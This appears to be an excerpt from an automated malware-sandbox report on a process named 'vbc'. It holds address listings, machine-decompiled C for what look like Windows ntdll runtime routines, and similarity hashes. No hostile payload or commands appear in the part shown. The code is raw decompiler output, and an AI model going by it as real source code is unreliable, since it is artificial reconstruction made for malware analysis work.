                                                  0x015efb3b
                                                  0x015efb3e
                                                  0x015efb41
                                                  0x015efb44
                                                  0x015efb47
                                                  0x015efb4a
                                                  0x015efb4d
                                                  0x015efb53
                                                  0x0162bdcb
                                                  0x0162bdcb
                                                  0x015efb59
                                                  0x015efb5b
                                                  0x015efb5b
                                                  0x015efb5e
                                                  0x0162bdd5
                                                  0x0162bdd8
                                                  0x00000000
                                                  0x0162bdda
                                                  0x00000000
                                                  0x0162bdda
                                                  0x015efb64
                                                  0x015efb64
                                                  0x015efb64
                                                  0x015efb67
                                                  0x015efb6e
                                                  0x015efb70
                                                  0x015efb72
                                                  0x00000000
                                                  0x015efb78
                                                  0x015efb7a
                                                  0x015efb7a
                                                  0x015efb7d
                                                  0x015efb80
                                                  0x0162bddf
                                                  0x0162bde1
                                                  0x00000000
                                                  0x0162bde3
                                                  0x00000000
                                                  0x0162bde3
                                                  0x015efb86
                                                  0x015efb86
                                                  0x015efb86
                                                  0x015efb8b
                                                  0x015efb90
                                                  0x015efb92
                                                  0x015efb94
                                                  0x015efb9a
                                                  0x015efb9b
                                                  0x015efba1
                                                  0x0162bde8
                                                  0x0162bdeb
                                                  0x0162bded
                                                  0x0162beb5
                                                  0x0162beb5
                                                  0x0162bebb
                                                  0x0162bebd
                                                  0x0162bec3
                                                  0x0162bed2
                                                  0x0162bedd
                                                  0x0162bedd
                                                  0x0162beed
                                                  0x00000000
                                                  0x0162bdf3
                                                  0x0162bdfe
                                                  0x0162be06
                                                  0x0162be0b
                                                  0x0162be0d
                                                  0x0162be0f
                                                  0x0162be14
                                                  0x0162be19
                                                  0x0162be20
                                                  0x0162be25
                                                  0x0162be27
                                                  0x0162be35
                                                  0x0162be39
                                                  0x0162be46
                                                  0x0162be4f
                                                  0x0162be54
                                                  0x0162be56
                                                  0x0162bef8
                                                  0x0162bef8
                                                  0x00000000
                                                  0x0162be5c
                                                  0x0162be5c
                                                  0x0162be60
                                                  0x00000000
                                                  0x0162be66
                                                  0x0162be66
                                                  0x0162be7f
                                                  0x0162be84
                                                  0x0162be87
                                                  0x0162be89
                                                  0x0162be8b
                                                  0x0162be99
                                                  0x0162be9d
                                                  0x0162bea0
                                                  0x0162beac
                                                  0x0162beaf
                                                  0x0162beb1
                                                  0x0162beb3
                                                  0x0162beb3
                                                  0x00000000
                                                  0x0162bea2
                                                  0x0162bea2
                                                  0x00000000
                                                  0x0162bea2
                                                  0x0162be8d
                                                  0x0162be8d
                                                  0x0162be92
                                                  0x00000000
                                                  0x0162be92
                                                  0x0162be8b
                                                  0x0162be60
                                                  0x0162be3b
                                                  0x0162be3b
                                                  0x0162be3e
                                                  0x00000000
                                                  0x0162be40
                                                  0x0162be40
                                                  0x0162be44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0162be44
                                                  0x0162be3e
                                                  0x0162be29
                                                  0x0162be29
                                                  0x00000000
                                                  0x0162be29
                                                  0x0162be27
                                                  0x00000000
                                                  0x015efba7
                                                  0x015efba7
                                                  0x015efbab
                                                  0x0162bf02
                                                  0x015efbb1
                                                  0x015efbb1
                                                  0x015efbb8
                                                  0x015efbbd
                                                  0x015efbbd
                                                  0x015efbbf
                                                  0x015efbbf
                                                  0x015efbc5
                                                  0x015efbcb
                                                  0x015efbf8
                                                  0x015efbf8
                                                  0x015efbfa
                                                  0x00000000
                                                  0x015efc00
                                                  0x015efc00
                                                  0x015efc03
                                                  0x00000000
                                                  0x015efc09
                                                  0x015efc09
                                                  0x015efc0f
                                                  0x015efc15
                                                  0x015efc23
                                                  0x015efc23
                                                  0x015efc25
                                                  0x015efc27
                                                  0x015efc75
                                                  0x015efc7c
                                                  0x015efc84
                                                  0x00000000
                                                  0x015efc29
                                                  0x015efc29
                                                  0x015efc2d
                                                  0x015efc30
                                                  0x0162bf0f
                                                  0x00000000
                                                  0x015efc36
                                                  0x015efc38
                                                  0x015efc3b
                                                  0x015efc41
                                                  0x0162bf17
                                                  0x0162bf19
                                                  0x0162bf48
                                                  0x0162bf4b
                                                  0x00000000
                                                  0x0162bf1b
                                                  0x0162bf22
                                                  0x0162bf24
                                                  0x0162bf26
                                                  0x00000000
                                                  0x0162bf2c
                                                  0x0162bf37
                                                  0x0162bf39
                                                  0x0162bf3b
                                                  0x00000000
                                                  0x0162bf41
                                                  0x0162bf41
                                                  0x0162bf41
                                                  0x0162bf41
                                                  0x0162bf45
                                                  0x00000000
                                                  0x0162bf45
                                                  0x0162bf3b
                                                  0x0162bf26
                                                  0x00000000
                                                  0x015efc47
                                                  0x015efc47
                                                  0x015efc49
                                                  0x015efcb2
                                                  0x015efcb4
                                                  0x015efcb6
                                                  0x015efcdc
                                                  0x015efcdc
                                                  0x00000000
                                                  0x015efcb8
                                                  0x015efcc3
                                                  0x015efcc5
                                                  0x015efcc7
                                                  0x00000000
                                                  0x015efcc9
                                                  0x015efcc9
                                                  0x015efccd
                                                  0x00000000
                                                  0x015efccd
                                                  0x015efcc7
                                                  0x00000000
                                                  0x015efc4b
                                                  0x015efc4b
                                                  0x015efc4e
                                                  0x015efc4e
                                                  0x015efc51
                                                  0x015efc51
                                                  0x015efc54
                                                  0x015efc5a
                                                  0x015efc5c
                                                  0x015efc5f
                                                  0x015efc61
                                                  0x015efc63
                                                  0x015efc65
                                                  0x015efc67
                                                  0x015efc6e
                                                  0x015efc72
                                                  0x015efc72
                                                  0x015efc72
                                                  0x015efc72
                                                  0x015efc67
                                                  0x015efc61
                                                  0x00000000
                                                  0x015efc5a
                                                  0x015efc49
                                                  0x015efc41
                                                  0x015efc30
                                                  0x015efc27
                                                  0x015efc03
                                                  0x015efbcd
                                                  0x015efbd3
                                                  0x015efbd9
                                                  0x015efbdc
                                                  0x015efbde
                                                  0x015efc99
                                                  0x015efc9b
                                                  0x015efc9d
                                                  0x015efcd5
                                                  0x015efcd5
                                                  0x015efc89
                                                  0x015efc89
                                                  0x00000000
                                                  0x015efc9f
                                                  0x015efc9f
                                                  0x015efca3
                                                  0x00000000
                                                  0x015efca3
                                                  0x00000000
                                                  0x015efbe4
                                                  0x015efbe4
                                                  0x015efbe4
                                                  0x015efbe4
                                                  0x015efbe9
                                                  0x015efbf2
                                                  0x00000000
                                                  0x015efbf2
                                                  0x015efbde
                                                  0x015efbcb
                                                  0x015efbab
                                                  0x015efc8b
                                                  0x015efc8b
                                                  0x015efc8c
                                                  0x015efb80
                                                  0x015efb72
                                                  0x015efb5e
                                                  0x015efc8d
                                                  0x015efc91
                                                  0x015efadf
                                                  0x015efadf
                                                  0x015efae1
                                                  0x015efae4
                                                  0x015efae7
                                                  0x015efaec
                                                  0x015efaf8
                                                  0x015efb00
                                                  0x015efb07
                                                  0x015efb0f
                                                  0x015efb0f
                                                  0x015efb07
                                                  0x00000000
                                                  0x015efaf8
                                                  0x015efadd

                                                  Strings
                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0162BE0F
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                  • API String ID: 0-865735534
                                                  • Opcode ID: 167e0fc3eb9049372eecd3415a457d7b83a931575fcc556be59f0b9629ed3503
                                                  • Instruction ID: bfbcecc14dbc86ad86a68c01c72abdfc74358067d92aa4fa9aa7724c41636f01
                                                  • Opcode Fuzzy Hash: 167e0fc3eb9049372eecd3415a457d7b83a931575fcc556be59f0b9629ed3503
                                                  • Instruction Fuzzy Hash: 8EA1E471E00A168BEB29CF68C8547BEB7E5FB48710F14496ED94A8F781DF30D8418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E015B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x16a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x16a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E015F97C0();
				}
				if( *0x16a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x16a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E015E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E015D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0164FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E015F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E015EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0160DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x16a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x16a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E015F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E015F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E015D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E015D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01637016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0164FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x16a5350;
							if(_t109 != 0x16a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0164FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01645720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                  0x015b2d8a
                                                  0x015b2d8a
                                                  0x015b2d92
                                                  0x015b2d96
                                                  0x015b2d9e
                                                  0x015b2da0
                                                  0x015b2da3
                                                  0x015b2da5
                                                  0x015b2da8
                                                  0x015b2dab
                                                  0x015b2db2
                                                  0x0160f9aa
                                                  0x0160f9ab
                                                  0x0160f9ae
                                                  0x0160f9ae
                                                  0x015b2db8
                                                  0x015b2dc2
                                                  0x0160f9b9
                                                  0x0160f9be
                                                  0x0160f9bf
                                                  0x0160f9bf
                                                  0x015b2dcf
                                                  0x0160f9c9
                                                  0x015b2dd5
                                                  0x015b2dd5
                                                  0x015b2dd5
                                                  0x015b2dde
                                                  0x015b2de1
                                                  0x015b2e70
                                                  0x015b2e72
                                                  0x015b2e72
                                                  0x015b2de7
                                                  0x015b2deb
                                                  0x015b2e7c
                                                  0x015b2e83
                                                  0x015b2e85
                                                  0x015b2e8b
                                                  0x015b2e8d
                                                  0x015b2e92
                                                  0x015b2e92
                                                  0x015b2e85
                                                  0x015b2df1
                                                  0x015b2df7
                                                  0x015b2df9
                                                  0x015b2df9
                                                  0x015b2dfc
                                                  0x015b2dff
                                                  0x015b2e02
                                                  0x00000000
                                                  0x015b2e05
                                                  0x015b2e0c
                                                  0x0160f9d9
                                                  0x015b2e12
                                                  0x015b2e12
                                                  0x015b2e12
                                                  0x015b2e1a
                                                  0x0160f9e3
                                                  0x0160f9e9
                                                  0x0160f9f0
                                                  0x0160f9f6
                                                  0x0160f9f8
                                                  0x0160f9f8
                                                  0x0160f9f0
                                                  0x015b2e23
                                                  0x0160fa02
                                                  0x0160fa03
                                                  0x0160fa05
                                                  0x0160fa06
                                                  0x00000000
                                                  0x015b2e29
                                                  0x015b2e29
                                                  0x015b2e2e
                                                  0x015b2e34
                                                  0x015b2e3e
                                                  0x00000000
                                                  0x00000000
                                                  0x015b2e44
                                                  0x015b2e47
                                                  0x015b2e4d
                                                  0x00000000
                                                  0x00000000
                                                  0x015b2e4f
                                                  0x015b2e54
                                                  0x00000000
                                                  0x00000000
                                                  0x015b2e5a
                                                  0x015b2e5f
                                                  0x015b2e9a
                                                  0x015b2ea4
                                                  0x015b2ea5
                                                  0x015b2ea8
                                                  0x015b2eaf
                                                  0x015b2eb2
                                                  0x015b2eb5
                                                  0x0160fae9
                                                  0x0160faeb
                                                  0x0160faed
                                                  0x0160faef
                                                  0x0160faf7
                                                  0x0160faf8
                                                  0x0160fafd
                                                  0x0160faff
                                                  0x0160fb04
                                                  0x0160fb04
                                                  0x0160faff
                                                  0x015b2ec0
                                                  0x015b2ec4
                                                  0x015b2ec6
                                                  0x015b2ec8
                                                  0x0160fb14
                                                  0x0160fb18
                                                  0x0160fb1e
                                                  0x0160fb21
                                                  0x0160fb21
                                                  0x015b2ece
                                                  0x015b2ece
                                                  0x015b2ece
                                                  0x015b2ed7
                                                  0x015b2e61
                                                  0x015b2e63
                                                  0x0160fa6b
                                                  0x0160fa71
                                                  0x0160fa76
                                                  0x0160fa78
                                                  0x0160fa8a
                                                  0x0160fa7a
                                                  0x0160fa83
                                                  0x0160fa83
                                                  0x0160fa8f
                                                  0x0160fa91
                                                  0x0160fa97
                                                  0x0160fa9d
                                                  0x0160faa4
                                                  0x0160faaa
                                                  0x0160faaf
                                                  0x0160fab1
                                                  0x0160fac3
                                                  0x0160fab3
                                                  0x0160fabc
                                                  0x0160fabc
                                                  0x0160fac8
                                                  0x0160facb
                                                  0x0160fadf
                                                  0x0160fadf
                                                  0x0160facb
                                                  0x0160faa4
                                                  0x0160fa91
                                                  0x015b2e6f
                                                  0x015b2e6f
                                                  0x015b2e5f
                                                  0x0160fa13
                                                  0x0160fa15
                                                  0x0160fa17
                                                  0x0160fa1f
                                                  0x0160fa21
                                                  0x0160fa22
                                                  0x0160fa25
                                                  0x0160fa28
                                                  0x0160fa2f
                                                  0x0160fa2f
                                                  0x0160fa2a
                                                  0x0160fa2a
                                                  0x0160fa2a
                                                  0x0160fa31
                                                  0x0160fa34
                                                  0x0160fa36
                                                  0x0160fa3c
                                                  0x0160fa3e
                                                  0x0160fa41
                                                  0x0160fa43
                                                  0x0160fa45
                                                  0x0160fa45
                                                  0x0160fa41
                                                  0x0160fa3c
                                                  0x0160fa4a
                                                  0x0160fa4f
                                                  0x0160fa51
                                                  0x0160fa53
                                                  0x0160fa56
                                                  0x0160fa5b
                                                  0x0160fa5e
                                                  0x00000000
                                                  0x0160fa5e
                                                  0x015b2e23

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Re-Waiting
                                                  • API String ID: 0-316354757
                                                  • Opcode ID: 16f9950445389684257921063fcfbb08c340e154653a035ec1545f2824925586
                                                  • Instruction ID: 3a3afb5d06aa92c06894ae670c4a87145554021f92a997f28f582ab6186aa3cf
                                                  • Opcode Fuzzy Hash: 16f9950445389684257921063fcfbb08c340e154653a035ec1545f2824925586
                                                  • Instruction Fuzzy Hash: 0F610131A00605DFDB36DB6CCC80BBF7BE1FB84314F1406A9E9119B2C1C734A9418BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01680EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E01680EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0167FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01681074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E015F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0167A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0167A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x16a8b04 >> 0x14) + (_v44 -  *0x16a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E015D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0167138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E015D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0166FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x16a8724 & 0x00000008) != 0) {
						E016752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E016815B5(0x16a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                  0x01680eb7
                                                  0x01680eb9
                                                  0x01680ec0
                                                  0x01680ec2
                                                  0x01680ecd
                                                  0x0168105b
                                                  0x0168105b
                                                  0x01681061
                                                  0x01681066
                                                  0x01681066
                                                  0x0168106b
                                                  0x01681073
                                                  0x01681073
                                                  0x01680ed3
                                                  0x01680ed6
                                                  0x01680edc
                                                  0x01680ee0
                                                  0x01680ee7
                                                  0x01680ef0
                                                  0x01680ef5
                                                  0x01680efa
                                                  0x01680efc
                                                  0x01680efd
                                                  0x01680f03
                                                  0x01680f04
                                                  0x01680f06
                                                  0x01680f07
                                                  0x01680f09
                                                  0x01680f0e
                                                  0x01680f14
                                                  0x01680f23
                                                  0x01680f2d
                                                  0x01680f34
                                                  0x01680f34
                                                  0x01680f14
                                                  0x01680f52
                                                  0x00000000
                                                  0x00000000
                                                  0x01680f58
                                                  0x01680f73
                                                  0x01680f74
                                                  0x01680f79
                                                  0x01680f7d
                                                  0x01680f80
                                                  0x01680f86
                                                  0x01680fab
                                                  0x01680fb5
                                                  0x01680fc6
                                                  0x01680fd1
                                                  0x01680fe3
                                                  0x01680fd3
                                                  0x01680fdc
                                                  0x01680fdc
                                                  0x01680feb
                                                  0x01681009
                                                  0x01681009
                                                  0x01681015
                                                  0x01681027
                                                  0x01681017
                                                  0x01681020
                                                  0x01681020
                                                  0x0168102f
                                                  0x0168103c
                                                  0x0168103c
                                                  0x01681048
                                                  0x01681050
                                                  0x01681050
                                                  0x01681055
                                                  0x00000000
                                                  0x01681055
                                                  0x01680f88
                                                  0x01680f9e
                                                  0x01680fa2
                                                  0x01680fa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01680fa9
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 0a2de676bc9e8d9d30e4ee85d19292b37ed9d799a5f1b1e698f2dd7b1e98907b
                                                  • Instruction ID: 7a40cc5eb4f6a43a7db574576e651d0000e57719795a557e9f05aff1958cd99e
                                                  • Opcode Fuzzy Hash: 0a2de676bc9e8d9d30e4ee85d19292b37ed9d799a5f1b1e698f2dd7b1e98907b
                                                  • Instruction Fuzzy Hash: 23518F713043429FD325EF18DC80B1BBBE5EBC5614F044A6DFA9697290DB71E806CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E015EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E015D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E015F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E015F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E015F95D0();
							goto L11;
						} else {
							_t109 = L015D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E015FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E015F95D0();
										L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                  0x015ef0d3
                                                  0x015ef0d9
                                                  0x015ef0e0
                                                  0x015ef0e7
                                                  0x015ef0f2
                                                  0x015ef0f4
                                                  0x015ef0f8
                                                  0x015ef100
                                                  0x015ef108
                                                  0x015ef10d
                                                  0x015ef115
                                                  0x015ef116
                                                  0x015ef11f
                                                  0x015ef123
                                                  0x015ef124
                                                  0x015ef12c
                                                  0x015ef130
                                                  0x015ef134
                                                  0x015ef13d
                                                  0x015ef144
                                                  0x015ef14b
                                                  0x015ef152
                                                  0x0162bab0
                                                  0x0162bab0
                                                  0x015ef158
                                                  0x015ef158
                                                  0x015ef15a
                                                  0x015ef160
                                                  0x015ef165
                                                  0x015ef166
                                                  0x015ef16f
                                                  0x015ef173
                                                  0x0162baa7
                                                  0x0162baa7
                                                  0x0162baab
                                                  0x00000000
                                                  0x015ef179
                                                  0x015ef18d
                                                  0x015ef191
                                                  0x0162baa2
                                                  0x00000000
                                                  0x015ef197
                                                  0x015ef19b
                                                  0x015ef1a2
                                                  0x015ef1a9
                                                  0x015ef1af
                                                  0x015ef1b2
                                                  0x015ef1b6
                                                  0x015ef1b9
                                                  0x015ef1c4
                                                  0x015ef1d8
                                                  0x015ef1df
                                                  0x015ef1e3
                                                  0x015ef1eb
                                                  0x015ef1ee
                                                  0x015ef1f4
                                                  0x015ef20f
                                                  0x0162bab7
                                                  0x0162babb
                                                  0x0162bacc
                                                  0x0162bad1
                                                  0x015ef215
                                                  0x015ef218
                                                  0x015ef226
                                                  0x015ef22b
                                                  0x00000000
                                                  0x015ef22b
                                                  0x015ef1f6
                                                  0x015ef1f6
                                                  0x015ef1f9
                                                  0x015ef1fb
                                                  0x015ef1fb
                                                  0x015ef1f4
                                                  0x015ef191
                                                  0x015ef173
                                                  0x015ef152
                                                  0x015ef203

                                                  Strings
                                                  Memory Dump Source
